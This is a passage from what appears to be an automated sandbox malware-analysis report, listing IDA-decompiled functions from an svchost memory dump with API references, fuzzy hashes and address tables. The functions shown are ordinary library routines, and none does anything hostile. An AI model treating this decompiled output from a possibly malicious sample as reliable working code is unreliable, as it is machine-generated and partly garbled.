    • InterlockedDecrement.KERNEL32(004E1C68), ref: 0047F043
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Interlocked$CriticalDecrementSection$EnterIncrementInitialize
    • String ID: $G
    • API String ID: 2038102319-4251033865
    • Opcode ID: fe310b87200f6335aa964317a5f483a811007d279342a33144b0d17023456f8d
    • Instruction ID: aedaaf6b50b4282826779a4088c432ce41799ab6089677abb8ff0e01e7dabbe2
    • Opcode Fuzzy Hash: fe310b87200f6335aa964317a5f483a811007d279342a33144b0d17023456f8d
    • Instruction Fuzzy Hash: 75F0593214038ABFDB112FA1AC85DEF3758EF55324F00803BFA0845222CBB99905C6ED
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00486D3D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00486D3D(void* __ecx, char _a4) {
				void* __edi;
				struct HRSRC__* _t6;
				void* _t7;
				void* _t10;
				void* _t13;
				struct HINSTANCE__* _t14;

				_t13 = 0;
				_t10 = __ecx;
				if(_a4 == 0) {
					L5:
					return E00486D8D(_t10, _t13, _t13);
				}
				_t14 =  *(E0048C6BF() + 0xc);
				_t3 =  &_a4; // 0x422723
				_t6 = FindResourceA(_t14,  *_t3, 0xf0);
				if(_t6 == 0) {
					goto L5;
				}
				_t7 = LoadResource(_t14, _t6);
				if(_t7 != 0) {
					_t13 = LockResource(_t7);
					goto L5;
				}
				return 0;
			}









    0x00486d40
    0x00486d46
    0x00486d48
    0x00486d7f
    0x00000000
    0x00486d82
    0x00486d4f
    0x00486d57
    0x00486d5c
    0x00486d64
    0x00000000
    0x00000000
    0x00486d68
    0x00486d70
    0x00486d7d
    0x00000000
    0x00486d7d
    0x00000000

    APIs
    • FindResourceA.KERNEL32(?,#'B,000000F0), ref: 00486D5C
    • LoadResource.KERNEL32(?,00000000,?,?,?,0048461A,?,?,00422723), ref: 00486D68
    • LockResource.KERNEL32(00000000,?,?,?,0048461A,?,?,00422723), ref: 00486D77
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Resource$FindLoadLock
    • String ID: #'B
    • API String ID: 2752051264-2271064946
    • Opcode ID: 2ed60adfe24fe4189b3203dd96297275d969be9fd8784dd3b5a667122052657b
    • Instruction ID: 42a326d73d8ace7ea1889e7075cff5908f208a5bd6f4f577a614dfd5ab42c14e
    • Opcode Fuzzy Hash: 2ed60adfe24fe4189b3203dd96297275d969be9fd8784dd3b5a667122052657b
    • Instruction Fuzzy Hash: DEE0ED32304541AB8A513B715C48C2FB2AEEFE0362B160D3BF101D2220CB788C0197BA
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0048A70B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
    Download Yara Rule
    C-Code - Quality: 37%
    			E0048A70B(struct HWND__* _a4, intOrPtr _a8) {
				char _v16;
				signed int _t13;

				if(_a4 == 0 || (GetWindowLongA(_a4, 0xfffffff0) & 0x0000000f) != _a8) {
					return 0;
				} else {
					GetClassNameA(_a4,  &_v16, 0xa);
					_t13 =  *0x4921fc( &_v16, "combobox");
					asm("sbb eax, eax");
					return  ~_t13 + 1;
				}
			}





    0x0048a715
    0x00000000
    0x0048a72e
    0x0048a737
    0x0048a746
    0x0048a74e
    0x00000000
    0x0048a750

    APIs
    • GetWindowLongA.USER32(00000000,000000F0), ref: 0048A71C
    • GetClassNameA.USER32(00000000,?,0000000A), ref: 0048A737
    • lstrcmpi.KERNEL32(?,combobox), ref: 0048A746
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ClassLongNameWindowlstrcmpi
    • String ID: combobox
    • API String ID: 2054663530-2240613097
    • Opcode ID: 1c89f458abd8a8783c90dcbfcca51aaaf6779af9c7ad10fd8bbccabddddfb23b
    • Instruction ID: 1b6b0dd0a1dfb06d7dab1ab4bad5f60124974abc731d42ffd47c67d457a6de76
    • Opcode Fuzzy Hash: 1c89f458abd8a8783c90dcbfcca51aaaf6779af9c7ad10fd8bbccabddddfb23b
    • Instruction Fuzzy Hash: 1BE0A031990109BFCF00AB30CC4AA9D3B78EB10346F108633F513D5090D6B4D618D74A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0047504A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 67%
    			E0047504A() {
				signed int _v12;
				signed long long _v20;
				signed long long _v28;
				void* _t10;
				struct HINSTANCE__* _t19;

				_t19 = GetModuleHandleA("KERNEL32");
				if(_t19 == 0) {
					L6:
					_v12 =  *0x49dc38;
					_v20 =  *0x49dc30;
					asm("fsubr qword [ebp-0x10]");
					_v28 = _v20 / _v12 * _v12;
					asm("fcomp qword [0x49d708]");
					asm("fnstsw ax");
					asm("sahf");
					if(_t19 <= 0) {
						return 0;
					} else {
						_t10 = 1;
						return _t10;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}








    0x00475055
    0x00475057
    0x0047506e
    0x00475018
    0x00475021
    0x0047502d
    0x00475030
    0x00475036
    0x0047503c
    0x0047503e
    0x0047503f
    0x00475049
    0x00475041
    0x00475043
    0x00475045
    0x00475045
    0x00475059
    0x0047505f
    0x00475067
    0x00000000
    0x00475069
    0x00475069
    0x0047506d
    0x0047506d
    0x00475067

    APIs
    • GetModuleHandleA.KERNEL32(KERNEL32,0046FEB7), ref: 0047504F
    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0047505F
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: IsProcessorFeaturePresent$KERNEL32
    • API String ID: 1646373207-3105848591
    • Opcode ID: df08a1f1b1451f35a8f91960e3785a0ece15d8066fab911b321486c4c17c9a15
    • Instruction ID: 5f9fd47c60502495a38e670b5bc96f9c7f14d2580cc4e3d54d0c3d1a5891e2ee
    • Opcode Fuzzy Hash: df08a1f1b1451f35a8f91960e3785a0ece15d8066fab911b321486c4c17c9a15
    • Instruction Fuzzy Hash: 4DC01220784740A2EE301BB20F09F6B2A58AB40B42F18883BA809F8180CADDC000E0AE
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00481077 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 303stringCOMMON
    Download Yara Rule
    C-Code - Quality: 70%
    			E00481077(intOrPtr* __ecx, void* __edx, signed char* _a4, char _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v14;
				signed int _v16;
				intOrPtr* _v20;
				char _v24;
				void* _v36;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t72;
				signed char _t75;
				signed int _t76;
				signed char _t77;
				signed int _t78;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t88;
				signed int _t89;
				signed int _t90;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t96;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				signed int _t112;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed int _t118;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t127;
				signed int _t129;
				signed char* _t130;
				signed char* _t135;
				signed int _t141;
				void* _t148;
				void* _t149;
				void* _t152;
				void* _t153;
				void* _t157;
				signed char* _t159;
				signed int _t164;
				void* _t166;
				long long* _t167;

				_t157 = __edx;
				_v12 = _v12 & 0x00000000;
				_t159 = _a4;
				_v20 = __ecx;
				_v24 = _a8;
				while( *_t159 != 0) {
					if( *_t159 != 0x25) {
						L90:
						_t72 = E0047342F(_t159);
						_t61 =  &_v12;
						 *_t61 = _v12 + _t72;
						__eflags =  *_t61;
						L91:
						_t159 = E00473418(_t159);
						continue;
					}
					_t159 = E00473418(_t159);
					_pop(_t148);
					_t75 =  *_t159;
					if(_t75 == 0x25) {
						goto L90;
					}
					_t164 = 0;
					_v8 = 0;
					if(_t75 == 0) {
						L15:
						_t76 = E004709B8(_t148, _t159);
						_pop(_t149);
						_v8 = _t76;
						while(1) {
							_t77 =  *_t159;
							if(_t77 == 0) {
								break;
							}
							_push(_t77);
							if(E00472F1E(_t149, _t159, _t164) == 0) {
								break;
							}
							_t135 = E00473418(_t159);
							_pop(_t149);
							_t159 = _t135;
						}
						L19:
						_t141 = 0;
						__eflags =  *_t159 - 0x2e;
						if( *_t159 != 0x2e) {
							L22:
							_v16 = _v16 & 0x00000000;
							_t78 = E004713BF(_t159, "I64", 3);
							_t167 = _t167 + 0xc;
							__eflags = _t78;
							if(_t78 != 0) {
								_t80 =  *_t159 - 0x46;
								__eflags = _t80;
								if(_t80 == 0) {
									L35:
									_t159 = E00473418(_t159);
									L36:
									_t83 =  *_t159 | _v16;
									__eflags = _t83 - 0x10063;
									if(__eflags > 0) {
										_t84 = _t83 - 0x10073;
										__eflags = _t84;
										if(_t84 == 0) {
											L61:
											_a8 = _a8 + 4;
											_t86 =  *(_a8 - 4);
											__eflags = _t86;
											if(_t86 != 0) {
												_t87 =  *0x4922a0(_t86);
												L64:
												_t164 = _t87;
												__eflags = _t164 - 1;
												if(_t164 < 1) {
													_t164 = 1;
												}
												__eflags = _t164;
												if(_t164 == 0) {
													L44:
													_t88 =  *_t159;
													__eflags = _t88 - 0x69;
													if(__eflags > 0) {
														_t89 = _t88 - 0x6e;
														__eflags = _t89;
														if(_t89 == 0) {
															_t57 =  &_a8;
															 *_t57 = _a8 + 4;
															__eflags =  *_t57;
															goto L89;
														}
														_t90 = _t89 - 1;
														__eflags = _t90;
														if(_t90 == 0) {
															L86:
															__eflags = _v14 & 0x00000004;
															if((_v14 & 0x00000004) == 0) {
																L82:
																_t49 =  &_a8;
																 *_t49 = _a8 + 4;
																__eflags =  *_t49;
																L83:
																_t164 = 0x20;
																L84:
																_t92 = _v8 + _t141;
																__eflags = _t92 - _t164;
																if(_t92 < _t164) {
																	goto L89;
																}
																L85:
																_t164 = _t92;
																goto L89;
															}
															_a8 = _a8 + 8;
															goto L83;
														}
														_t93 = _t90 - 1;
														__eflags = _t93;
														if(_t93 == 0) {
															goto L82;
														}
														_t94 = _t93 - 5;
														__eflags = _t94;
														if(_t94 == 0) {
															goto L86;
														}
														__eflags = _t94 == 3;
														if(_t94 == 3) {
															goto L86;
														}
														goto L89;
													}
													if(__eflags == 0) {
														goto L86;
													}
													_t96 = _t88 - 0x47;
													__eflags = _t96;
													if(_t96 == 0) {
														L75:
														_a8 = _a8 + 8;
														_t164 = 0x80;
														goto L84;
													}
													_t97 = _t96 - 0x11;
													__eflags = _t97;
													if(_t97 == 0) {
														goto L86;
													}
													_t98 = _t97 - 0xc;
													__eflags = _t98;
													if(_t98 == 0) {
														goto L86;
													}
													_t99 = _t98 - 1;
													__eflags = _t99;
													if(_t99 == 0) {
														goto L75;
													}
													_t100 = _t99 - 1;
													__eflags = _t100;
													if(_t100 == 0) {
														_t39 = _t141 + 0x13e; // 0x13e
														_t101 = _t39;
														__eflags = _v8 - _t101;
														if(_v8 > _t101) {
															_t101 = _v8;
														}
														E00471390(_t101 + 0x00000003 & 0x000000fc, 0x10063);
														_a8 = _a8 + 8;
														_push(0x10063);
														_push(0x10063);
														 *_t167 =  *((long long*)(_a8 - 8));
														_push(_t141 + 6);
														E0047262F(_t157, _t167, "%*.*f", _v8);
														_t92 = E00473450(_t167);
														_t167 = _t167 + 0x1c;
														goto L85;
													}
													__eflags = _t100 == 1;
													if(_t100 == 1) {
														goto L75;
													}
													goto L89;
												} else {
													L67:
													__eflags = _t141;
													if(_t141 != 0) {
														__eflags = _t164 - _t141;
														if(_t164 >= _t141) {
															_t164 = _t141;
														}
													}
													__eflags = _t164 - _v8;
													if(_t164 <= _v8) {
														_t164 = _v8;
													}
													L89:
													_v12 = _v12 + _t164;
													goto L91;
												}
											}
											L62:
											_t164 = 6;
											goto L67;
										}
										_t108 = _t84 - 0xffd0;
										__eflags = _t108;
										if(_t108 == 0) {
											L60:
											_a8 = _a8 + 4;
											_t164 = 2;
											goto L67;
										}
										_t109 = _t108 - 0x10;
										__eflags = _t109;
										if(_t109 == 0) {
											L58:
											_a8 = _a8 + 4;
											_t111 =  *(_a8 - 4);
											__eflags = _t111;
											if(_t111 == 0) {
												goto L62;
											}
											_t87 = E004732E5(_t111);
											_pop(0x10063);
											goto L64;
										}
										_t112 = _t109 - 0x10;
										__eflags = _t112;
										if(_t112 == 0) {
											goto L60;
										}
										__eflags = _t112 != 0x10;
										if(_t112 != 0x10) {
											goto L44;
										}
										goto L58;
									}
									if(__eflags == 0) {
										goto L60;
									}
									_t114 = _t83 - 0x43;
									__eflags = _t114;
									if(_t114 == 0) {
										goto L60;
									}
									0x10063 = 0x10;
									_t115 = _t114 - 0x10063;
									__eflags = _t115;
									if(_t115 == 0) {
										goto L58;
									}
									_t116 = _t115 - 0x10063;
									__eflags = _t116;
									if(_t116 == 0) {
										goto L60;
									}
									_t117 = _t116 - 0x10063;
									__eflags = _t117;
									if(_t117 == 0) {
										goto L61;
									}
									_t118 = _t117 - 0xffd0;
									__eflags = _t118;
									if(_t118 == 0) {
										goto L60;
									}
									__eflags = _t118 == 0x10063;
									if(_t118 == 0x10063) {
										goto L61;
									}
									goto L44;
								}
								_t120 = _t80 - 6;
								__eflags = _t120;
								if(_t120 == 0) {
									goto L35;
								}
								_t122 = _t120;
								__eflags = _t122;
								if(_t122 == 0) {
									goto L35;
								}
								_t123 = _t122 - 0x1a;
								__eflags = _t123;
								if(_t123 == 0) {
									_v16 = 0x10000;
									goto L35;
								}
								__eflags = _t123 != 4;
								if(_t123 != 4) {
									goto L36;
								}
								_v16 = 0x20000;
								goto L35;
							}
							_t159 =  &(_t159[3]);
							_v16 = 0x40000;
							goto L36;
						}
						_t159 = E00473418(_t159);
						_pop(_t152);
						__eflags =  *_t159 - 0x2a;
						if( *_t159 != 0x2a) {
							_t126 = E004709B8(_t152, _t159);
							_pop(_t153);
							_t141 = _t126;
							while(1) {
								_t127 =  *_t159;
								__eflags = _t127;
								if(_t127 == 0) {
									goto L22;
								}
								_push(_t127);
								_t129 = E00472F1E(_t153, _t159, _t164);
								__eflags = _t129;
								if(_t129 == 0) {
									goto L22;
								}
								_t130 = E00473418(_t159);
								_pop(_t153);
								_t159 = _t130;
							}
							goto L22;
						}
						_t17 =  &_a8;
						 *_t17 = _a8 + 4;
						__eflags =  *_t17;
						_t141 =  *(_a8 - 4);
						_t159 = E00473418(_t159);
						goto L22;
					} else {
						goto L5;
					}
					do {
						L5:
						if(_t75 != 0x23) {
							__eflags = _t75 - 0x2a;
							if(_t75 != 0x2a) {
								__eflags = _t75 - 0x2d;
								if(_t75 == 0x2d) {
									goto L13;
								}
								__eflags = _t75 - 0x2b;
								if(_t75 == 0x2b) {
									goto L13;
								}
								__eflags = _t75 - 0x30;
								if(_t75 == 0x30) {
									goto L13;
								}
								__eflags = _t75 - 0x20;
								if(_t75 != 0x20) {
									break;
								}
								goto L13;
							}
							_a8 = _a8 + 4;
							_v8 =  *(_a8 - 4);
						} else {
							_v12 = _v12 + 2;
						}
						L13:
						_t159 = E00473418(_t159);
						_pop(_t148);
						_t75 =  *_t159;
					} while (_t75 != 0);
					if(_v8 != _t164) {
						goto L19;
					}
					goto L15;
				}
				E004836A6(_v20, _t166, _v12);
				E00472AEA(_t157,  *_v20, _a4, _v24);
				return E004836F5(_v20, __eflags, 0xffffffff);
			}






























































    0x00481077
    0x00481080
    0x00481087
    0x0048108a
    0x0048108d
    0x00481090
    0x0048109c
    0x0048137c
    0x0048137d
    0x00481382
    0x00481382
    0x00481382
    0x00481386
    0x0048138d
    0x00000000
    0x0048138d
    0x004810a8
    0x004810aa
    0x004810ab
    0x004810af
    0x00000000
    0x00000000
    0x004810b5
    0x004810b9
    0x004810bc
    0x004810ff
    0x00481100
    0x00481105
    0x00481106
    0x00481109
    0x00481109
    0x0048110d
    0x00000000
    0x00000000
    0x00481112
    0x0048111b
    0x00000000
    0x00000000
    0x0048111e
    0x00481123
    0x00481124
    0x00481124
    0x00481128
    0x00481128
    0x0048112a
    0x0048112d
    0x00481150
    0x00481150
    0x0048115c
    0x00481161
    0x00481164
    0x00481166
    0x0048119f
    0x0048119f
    0x004811a2
    0x004811c7
    0x004811ce
    0x004811d0
    0x004811d3
    0x004811db
    0x004811dd
    0x00481267
    0x00481267
    0x0048126c
    0x004812a4
    0x004812a4
    0x004812ab
    0x004812ae
    0x004812b0
    0x004812b8
    0x004812be
    0x004812be
    0x004812c0
    0x004812c3
    0x004812c7
    0x004812c7
    0x004812c8
    0x004812ca
    0x00481220
    0x00481220
    0x00481223
    0x00481226
    0x0048133c
    0x0048133c
    0x0048133f
    0x00481373
    0x00481373
    0x00481373
    0x00000000
    0x00481373
    0x00481341
    0x00481341
    0x00481342
    0x00481367
    0x00481367
    0x0048136b
    0x00481353
    0x00481353
    0x00481353
    0x00481353
    0x00481357
    0x00481359
    0x0048135a
    0x0048135d
    0x0048135f
    0x00481361
    0x00000000
    0x00000000
    0x00481363
    0x00481363
    0x00000000
    0x00481363
    0x0048136d
    0x00000000
    0x0048136d
    0x00481344
    0x00481344
    0x00481345
    0x00000000
    0x00000000
    0x00481347
    0x00481347
    0x0048134a
    0x00000000
    0x00000000
    0x0048134c
    0x0048134f
    0x00000000
    0x00000000
    0x00000000
    0x00481351
    0x0048122c
    0x00000000
    0x00000000
    0x00481232
    0x00481232
    0x00481235
    0x00481331
    0x00481331
    0x00481335
    0x00000000
    0x00481335
    0x0048123b
    0x0048123b
    0x0048123e
    0x00000000
    0x00000000
    0x00481244
    0x00481244
    0x00481247
    0x00000000
    0x00000000
    0x0048124d
    0x0048124d
    0x0048124e
    0x00000000
    0x00000000
    0x00481254
    0x00481254
    0x00481255
    0x004812eb
    0x004812eb
    0x004812f1
    0x004812f4
    0x004812f6
    0x004812f6
    0x004812fe
    0x00481303
    0x0048130c
    0x0048130d
    0x00481314
    0x00481317
    0x00481321
    0x00481327
    0x0048132c
    0x00000000
    0x0048132c
    0x0048125b
    0x0048125c
    0x00000000
    0x00000000
    0x00000000
    0x004812d0
    0x004812d0
    0x004812d0
    0x004812d2
    0x004812d4
    0x004812d6
    0x004812d8
    0x004812d8
    0x004812d6
    0x004812da
    0x004812dd
    0x004812e3
    0x004812e3
    0x00481377
    0x00481377
    0x00000000
    0x00481377
    0x004812ca
    0x004812b2
    0x004812b4
    0x00000000
    0x004812b4
    0x0048126e
    0x0048126e
    0x00481273
    0x0048129b
    0x0048129b
    0x004812a1
    0x00000000
    0x004812a1
    0x00481275
    0x00481275
    0x00481278
    0x00481284
    0x00481284
    0x0048128b
    0x0048128e
    0x00481290
    0x00000000
    0x00000000
    0x00481293
    0x00481298
    0x00000000
    0x00481298
    0x0048127a
    0x0048127a
    0x0048127d
    0x00000000
    0x00000000
    0x0048127f
    0x00481282
    0x00000000
    0x00000000
    0x00000000
    0x00481282
    0x004811e3
    0x00000000
    0x00000000
    0x004811e9
    0x004811e9
    0x004811ec
    0x00000000
    0x00000000
    0x004811f4
    0x004811f5
    0x004811f5
    0x004811f7
    0x00000000
    0x00000000
    0x004811fd
    0x004811fd
    0x004811ff
    0x00000000
    0x00000000
    0x00481205
    0x00481205
    0x00481207
    0x00000000
    0x00000000
    0x0048120d
    0x0048120d
    0x00481212
    0x00000000
    0x00000000
    0x00481218
    0x0048121a
    0x00000000
    0x00000000
    0x00000000
    0x0048121a
    0x004811a4
    0x004811a4
    0x004811a7
    0x00000000
    0x00000000
    0x004811aa
    0x004811aa
    0x004811ab
    0x00000000
    0x00000000
    0x004811ad
    0x004811ad
    0x004811b0
    0x004811c0
    0x00000000
    0x004811c0
    0x004811b2
    0x004811b5
    0x00000000
    0x00000000
    0x004811b7
    0x00000000
    0x004811b7
    0x00481168
    0x0048116b
    0x00000000
    0x0048116b
    0x00481135
    0x00481137
    0x00481138
    0x0048113b
    0x00481175
    0x0048117a
    0x0048117b
    0x0048117d
    0x0048117d
    0x0048117f
    0x00481181
    0x00000000
    0x00000000
    0x00481186
    0x00481187
    0x0048118c
    0x0048118f
    0x00000000
    0x00000000
    0x00481192
    0x00481197
    0x00481198
    0x00481198
    0x00000000
    0x0048117d
    0x0048113d
    0x0048113d
    0x0048113d
    0x00481145
    0x0048114e
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004810be
    0x004810be
    0x004810c0
    0x004810c8
    0x004810ca
    0x004810db
    0x004810dd
    0x00000000
    0x00000000
    0x004810df
    0x004810e1
    0x00000000
    0x00000000
    0x004810e3
    0x004810e5
    0x00000000
    0x00000000
    0x004810e7
    0x004810e9
    0x00000000
    0x00000000
    0x00000000
    0x004810e9
    0x004810cc
    0x004810d6
    0x004810c2
    0x004810c2
    0x004810c2
    0x004810eb
    0x004810f1
    0x004810f3
    0x004810f4
    0x004810f6
    0x004810fd
    0x00000000
    0x00000000
    0x00000000
    0x004810fd
    0x0048139c
    0x004813a9
    0x004813c1

    APIs
    • lstrlen.KERNEL32(?,^I,?,?), ref: 004812B8
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: lstrlen
    • String ID: %*.*f$I64$^I
    • API String ID: 1659193697-3458361620
    • Opcode ID: 6d10e7a5f28ad1e13bb37acea62b9423f4d609f69987ba439c865b1b84b4a454
    • Instruction ID: b3e8c289641e53a1f45ba24b4284ba3d53b9f4b839c1894564bd4699f4080610
    • Opcode Fuzzy Hash: 6d10e7a5f28ad1e13bb37acea62b9423f4d609f69987ba439c865b1b84b4a454
    • Instruction Fuzzy Hash: BE915972800145ABEB21BE6995486FE77AC9B06324F18886BEC40E7771D73CCE43975D
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00428EB0 Relevance: 6.2, APIs: 4, Instructions: 246COMMON
    Download Yara Rule
    C-Code - Quality: 95%
    			E00428EB0(long __ecx) {
				int _v4;
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				void _v84;
				intOrPtr _v88;
				char _v92;
				int _v96;
				long _v116;
				intOrPtr _v128;
				HMIDISTRM* _t128;
				intOrPtr _t132;
				intOrPtr _t135;
				int _t139;
				struct midihdr_tag _t143;
				intOrPtr _t146;
				void* _t147;
				void* _t159;
				int _t168;
				int _t184;
				signed int _t220;
				signed int _t236;
				void* _t256;
				long _t257;
				intOrPtr _t263;
				void* _t266;
				void* _t268;

				_t266 =  &_v96;
				_t262 = __ecx;
				_t128 = __ecx + 0x1c;
				_v96 = 0;
				if( *(__ecx + 0x1c) != 0) {
					L3:
					_v20 = 0;
					_v16 = 0;
					_v12 = 0;
					_v8 = 0;
					_v4 = 0;
					memset( &_v84, 0, 0x10 << 2);
					_t256 = _t262 + 0x7c;
					_t132 = E00429EB0( *((intOrPtr*)(_t262 + 0x84)),  *((intOrPtr*)(_t262 + 0x84)),  *((intOrPtr*)(_t262 + 0x80)));
					_t268 = _t266 + 0x18;
					_t263 = _t132;
